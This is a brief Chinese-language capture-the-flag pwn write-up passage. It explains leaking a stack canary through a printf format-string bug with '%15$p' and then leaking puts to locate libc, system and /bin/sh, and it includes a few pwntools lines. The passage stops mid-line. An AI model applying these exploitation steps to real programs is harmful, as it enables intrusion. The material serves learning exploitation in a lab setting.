pwn
这道题目开了canary,和之前的套路相似,就是要泄露canary,利用栈溢出找到system和/bin/sh,拿到访问权限
看一下函数
printf存在格式化字符串漏洞可以用于泄漏canary
p.sendlineafter("ID:","%15$p") #不解释了这个要打印的是第十五个参数,也就是canary的值
p.recvuntil("Hello ")#输出hello之后
s=int(p.recvuntil("00"),16)canary的值
print hex(s)#把它打印出来
然后因为里面system和/bin/sh,想要找到,就要找到libc库,要找libc库就可以想办法泄漏某个函数地址
我在这里学到的是一般泄露puts函数
p.sendlineafter("Tell me